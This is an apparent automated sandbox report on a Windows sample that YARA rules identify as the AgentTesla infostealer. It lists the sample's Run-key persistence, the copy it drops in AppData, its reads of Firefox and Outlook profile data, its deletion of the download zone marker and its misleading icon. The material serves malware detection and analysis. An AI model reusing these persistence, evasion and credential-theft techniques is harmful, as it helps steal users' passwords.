                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00F09D902_2_00F09D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00F0A0D82_2_00F0A0D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00F073B02_2_00F073B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060DC7602_2_060DC760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060D0F302_2_060D0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060D694A2_2_060D694A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060DD8782_2_060DD878
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060DD9282_2_060DD928
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061150782_2_06115078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06115DD82_2_06115DD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A6522_2_0611A652
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061130C82_2_061130C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061221B82_2_061221B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0612DC682_2_0612DC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061386902_2_06138690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061316B42_2_061316B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613DD702_2_0613DD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06130A502_2_06130A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06134A742_2_06134A74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613B7472_2_0613B747
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613B7482_2_0613B748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613D2902_2_0613D290
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: String function: 0094EC2F appears 68 times
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: String function: 00956AC0 appears 42 times
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: String function: 0095F8A0 appears 35 times
                Source: SOA_9828392091.exe, 00000000.00000003.2121651808.0000000004023000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SOA_9828392091.exe
                Source: SOA_9828392091.exe, 00000000.00000003.2117698741.00000000041CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SOA_9828392091.exe
                Source: SOA_9828392091.exe, 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename42805d09-10a7-49d5-a54d-c85a34de8bb7.exe4 vs SOA_9828392091.exe
                Source: SOA_9828392091.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: SOA_9828392091.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9887368824294205
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, G.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, G.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, G.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, G.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, F.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/1
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097CE7A GetLastError,FormatMessageW,0_2_0097CE7A
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096AB84 AdjustTokenPrivileges,CloseHandle,0_2_0096AB84
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0096B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0096B134
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0097E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0097E1FD
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00976532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00976532
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0098C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0098C18C
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0093406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0093406B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\yGbzOMpJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                Source: C:\Users\user\Desktop\SOA_9828392091.exeFile created: C:\Users\user\AppData\Local\Temp\aut87C6.tmpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000002.00000002.4577127670.0000000002F14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SOA_9828392091.exeReversingLabs: Detection: 39%
                Source: SOA_9828392091.exeVirustotal: Detection: 28%
                Source: unknownProcess created: C:\Users\user\Desktop\SOA_9828392091.exe "C:\Users\user\Desktop\SOA_9828392091.exe"
                Source: C:\Users\user\Desktop\SOA_9828392091.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA_9828392091.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe "C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SOA_9828392091.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA_9828392091.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: RegSvcs.pdb, source: yGbzOMp.exe, 00000004.00000000.2274410733.0000000000662000.00000002.00000001.01000000.00000006.sdmp, yGbzOMp.exe.2.dr
                Source: Binary string: wntdll.pdbUGP source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SOA_9828392091.exe, 00000000.00000003.2121849004.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, SOA_9828392091.exe, 00000000.00000003.2123023046.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: yGbzOMp.exe, 00000004.00000000.2274410733.0000000000662000.00000002.00000001.01000000.00000006.sdmp, yGbzOMp.exe.2.dr
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00A55F70 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00A55F70
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_009C05B8 push ss; ret 0_2_009C05B9
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00956B05 push ecx; ret 0_2_00956B18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060DC65A push ds; ret 2_2_060DC661
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060DB0CA push 8BFFFFFFh; retf 2_2_060DB0D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_060DBB7A push es; ret 2_2_060DBB90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06112623 push esp; ret 2_2_06112671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A22B push es; retf 2_2_0611A2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A2C3 push es; retf 2_2_0611A358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A35B push es; retf 2_2_0611A358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611B795 push es; ret 2_2_0611B798
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3D3 push es; retf 2_2_0611A3D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3D7 push es; retf 2_2_0611A3D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3DB push es; retf 2_2_0611A3DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3DF push es; retf 2_2_0611A3E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3F3 push es; retf 2_2_0611A3F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3E3 push es; retf 2_2_0611A3E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3E7 push es; retf 2_2_0611A3E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3EB push es; retf 2_2_0611A3EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A3EF push es; retf 2_2_0611A3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A119 push es; retf 2_2_0611A190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611B9D5 push es; retf 2_2_0611BB6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A1DB push es; retf 2_2_0611A1DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0611A1F1 push es; retf 2_2_0611A228
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613C43E pushad ; ret 2_2_0613C48D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613A455 push edi; iretd 2_2_0613A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061364B9 push es; retf 2_2_06136828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613C5CE pushfd ; ret 2_2_0613C61D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0613C3EE push esp; ret 2_2_0613C43D
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yGbzOMpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yGbzOMpJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Icon mismatch, binary includes an icon from a different legit application in order to fool users
                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_00998111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00998111
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0094EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0094EB42
                Source: C:\Users\user\Desktop\SOA_9828392091.exeCode function: 0_2_0095123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0095123A
                Source: C:\Users\user\Desktop\SOA_9828392091.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
